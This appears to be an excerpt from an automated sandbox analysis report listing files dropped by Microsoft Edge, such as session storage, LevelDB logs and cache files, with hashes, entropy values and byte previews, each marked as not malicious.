                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6307
                                                                                                                                                                  Entropy (8bit):3.394463734743451
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:1YsQFUS8Z+A9XT+2BKUUDcLl9iSrlKyYH+:1UFUS49XT+2MyLl9iSrcBH+
                                                                                                                                                                  MD5:3EFB057EF549230CF851BDCA35B91662
                                                                                                                                                                  SHA1:51BC171F94EBF0D77387E9263F04447E06E838E4
                                                                                                                                                                  SHA-256:135A2E1BE4CB4773938BDD8AB95A1784332C5FD4A132605036B9E0BA45369948
                                                                                                                                                                  SHA-512:7EB236DA2FA4B51625934B65AEA3D563BFC1C87C1F6153DEAF36392B62991215898AB70EAB72D8C9A3FA10D33D00141836F9EF596873C280E8B4E76A7CA9126B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f..................b................next-map-id.1.Cnamespace-9920fe2f_9b67_4c42_b599_68f029b31447-https://ntp.msn.com/.0J../8................map-0-shd_sweeper..{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.a.d.s.-.c.e.l.e.b.c.b.v.4.-.c.,.1.s.-.p.n.p.f.e.d.l.o.c.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.1.s.w.-.s.a.n.t.f.-.l.n.r.m.t.,.p.r.g.-.1.s.w.-.s.a.-.c.a.p.c.o.n.f.2.t.2.,.p.r.g.-.1.s.w.-.s.a.-.s.p.7.-.t.2.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.t.,.p.r.g.-.1.s.w.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.1.s.w.-.t.r.a.n.-.t.r.d.,.p.r.g.-.f.i.n.-.c.l.e.f.t.r.a.,.r.o.u.t.e.g.r.a.p.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                  Entropy (8bit):5.178785099885535
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/hVq2Pwkn23oH+TcwtrQMxIFUtN9F0gZmwzE7VSIkwOwkn23oH+TcwtrQMFLJ:7/bvYfYebCFUtNn9/za75JfYebtJ
                                                                                                                                                                  MD5:9031FB98A84B65E2A17299CDB313985C
                                                                                                                                                                  SHA1:4D3B4EAC90022C137E80E0F5C6374956F5D251E0
                                                                                                                                                                  SHA-256:F523C5341C89027C0934FEA858367728E0255871D9B21FD7A28871AD48D7F18F
                                                                                                                                                                  SHA-512:79F6D6E30C82BFEC3E88A5B97C306C3FBBA2AE9653AE21C3E0E4A62F82080123202F7427CA21050D95C7608F4B710B8EEB4DA03FAF6FFA8B0CBFD91FEE646858
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.858 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/06-17:17:54.859 1870 Recovering log #3.2025/01/06-17:17:54.861 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                  Entropy (8bit):5.178785099885535
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/hVq2Pwkn23oH+TcwtrQMxIFUtN9F0gZmwzE7VSIkwOwkn23oH+TcwtrQMFLJ:7/bvYfYebCFUtNn9/za75JfYebtJ
                                                                                                                                                                  MD5:9031FB98A84B65E2A17299CDB313985C
                                                                                                                                                                  SHA1:4D3B4EAC90022C137E80E0F5C6374956F5D251E0
                                                                                                                                                                  SHA-256:F523C5341C89027C0934FEA858367728E0255871D9B21FD7A28871AD48D7F18F
                                                                                                                                                                  SHA-512:79F6D6E30C82BFEC3E88A5B97C306C3FBBA2AE9653AE21C3E0E4A62F82080123202F7427CA21050D95C7608F4B710B8EEB4DA03FAF6FFA8B0CBFD91FEE646858
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.858 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/06-17:17:54.859 1870 Recovering log #3.2025/01/06-17:17:54.861 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380675476797357

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1443
                                                                                                                                                                  Entropy (8bit):3.7485158954188966
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:3olLikfdpsAF4unxEtLp3X2amEtG1Chq6ysuCFclkQKkOAM4:3olLRVzFiLp2FEkChCsV+lFHOp
                                                                                                                                                                  MD5:5CBC363EE54F583ADB90BC8C9E0F8F55
                                                                                                                                                                  SHA1:FCB86C1E17E1327B225DFE60F5B8477B8EE3465B
                                                                                                                                                                  SHA-256:7A07F3B911E0EBCBEDB79DAF6D5EBBF77F7F56A138E4E28D993EEBCD31827F4A
                                                                                                                                                                  SHA-512:954B2C2C3D5F82216322FA49BB8B7AF2963CDE732F28A07965EFD5EA8F8C6C517FD77D1857932D3571E3CC18FEB6376E2205458001C0ABC9BB50E52E00435D8F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SNSS.........z..............z......."..z..............z..........z..........z..........z.....!....z..................................z...z.1..,.....z.$...9920fe2f_9b67_4c42_b599_68f029b31447.....z..........z.....3^...........z......z..........................z.....................5..0.....z.&...{1A5CCF63-1000-409F-B5C1-AFEC7F75D4D9}.......z..........z.............................z..............z.........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........2..+....2..+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                  Entropy (8bit):5.138458582630739
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/wq2Pwkn23oH+Tcwt7Uh2ghZIFUtNRZmwzEzkwOwkn23oH+Tcwt7Uh2gnLJ:7/wvYfYebIhHh2FUtNR/zEz5JfYebIh9
                                                                                                                                                                  MD5:1BF3F7DA4D4F8D63567ED74138253AD1
                                                                                                                                                                  SHA1:B011852B12DCDEAA2A4F0C4FB3D29961D564944B
                                                                                                                                                                  SHA-256:A2C11DC8EF11D10331230C1D99824EC5A6AAE750C8C2247F3BCC9D7E7CAEF7E5
                                                                                                                                                                  SHA-512:C0D0A490758E295C0AC01E9E84324D8EC1AD6DED3ED7BFB69968B0F201AFF351952905A3E88CA740400844427D094E1DD683DACB0F0773194DC3F134CE7C6FA8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.355 1ec0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/06-17:17:54.355 1ec0 Recovering log #3.2025/01/06-17:17:54.356 1ec0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                  Entropy (8bit):5.138458582630739
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/wq2Pwkn23oH+Tcwt7Uh2ghZIFUtNRZmwzEzkwOwkn23oH+Tcwt7Uh2gnLJ:7/wvYfYebIhHh2FUtNR/zEz5JfYebIh9
                                                                                                                                                                  MD5:1BF3F7DA4D4F8D63567ED74138253AD1
                                                                                                                                                                  SHA1:B011852B12DCDEAA2A4F0C4FB3D29961D564944B
                                                                                                                                                                  SHA-256:A2C11DC8EF11D10331230C1D99824EC5A6AAE750C8C2247F3BCC9D7E7CAEF7E5
                                                                                                                                                                  SHA-512:C0D0A490758E295C0AC01E9E84324D8EC1AD6DED3ED7BFB69968B0F201AFF351952905A3E88CA740400844427D094E1DD683DACB0F0773194DC3F134CE7C6FA8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.355 1ec0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/06-17:17:54.355 1ec0 Recovering log #3.2025/01/06-17:17:54.356 1ec0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):524656
                                                                                                                                                                  Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Lsulls+l:LsWsa
                                                                                                                                                                  MD5:83CFC9624DC412C0D9B4587088EF61CC
                                                                                                                                                                  SHA1:F1606863D8851388F2212B35622453655979A36F
                                                                                                                                                                  SHA-256:A3A1D766E29620BC344FD542F31AE5C086258B9A1F3D5EFD46BE1AFD5B400DC8
                                                                                                                                                                  SHA-512:9B808F8A753173F4263EC24378D89305272C5B4BBB1BBDD591C98CFA433610DBAD17EB2484670F59FF780DF099E7E4B3436805C57BD036E56DFE1B3B90557BBB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..........................................H../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNlotCrll:Ls3otCxl
                                                                                                                                                                  MD5:05A6ED02C2C90DA8DCCC3C92642BB5E2
                                                                                                                                                                  SHA1:40E4D598DB58923DBB408C510184082088E06C34
                                                                                                                                                                  SHA-256:A8E978491CF90CCAF3685BD277A777CDBE53E6D89A09C904DFA07EBC10CFA4F8
                                                                                                                                                                  SHA-512:18C4D9327857FD86C82AF152EE2E0FDBA94BC2474177F6B506E454AE73ED714E3AF161BE3D74C0F1F17A2E78E5F990EFFEFEE0A270BF6017F4293EA80B02F0CC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.........................................`.H../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                  Entropy (8bit):5.261342921880708
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/MVvYfYebvqBQFUtNMH/zMo5JfYebvqBvJ:7/M5YfYebvZgNMbMyJfYebvk
                                                                                                                                                                  MD5:2FB344C5DFBAEFB6CF44A4DDD3C6018E
                                                                                                                                                                  SHA1:5F653243D725153B962917B7D89B823E38188B32
                                                                                                                                                                  SHA-256:C3BB30DAFD0AEA0C1FDC3EFAD48150946B6C142582ED127482549D7A70747CFD
                                                                                                                                                                  SHA-512:C61296A69F17DB7501E3618FF4B9050B68FD780BF72A8376BB625B5989DE647537B12168A455B03A02E5611AD43D65A9B4D06D95FFEDFD7D40603435EB322EF1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:55.472 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:17:55.473 1870 Recovering log #3.2025/01/06-17:17:55.520 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                  Entropy (8bit):5.261342921880708
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/MVvYfYebvqBQFUtNMH/zMo5JfYebvqBvJ:7/M5YfYebvZgNMbMyJfYebvk
                                                                                                                                                                  MD5:2FB344C5DFBAEFB6CF44A4DDD3C6018E
                                                                                                                                                                  SHA1:5F653243D725153B962917B7D89B823E38188B32
                                                                                                                                                                  SHA-256:C3BB30DAFD0AEA0C1FDC3EFAD48150946B6C142582ED127482549D7A70747CFD
                                                                                                                                                                  SHA-512:C61296A69F17DB7501E3618FF4B9050B68FD780BF72A8376BB625B5989DE647537B12168A455B03A02E5611AD43D65A9B4D06D95FFEDFD7D40603435EB322EF1
                                                                                                                                                                  Malicious:false
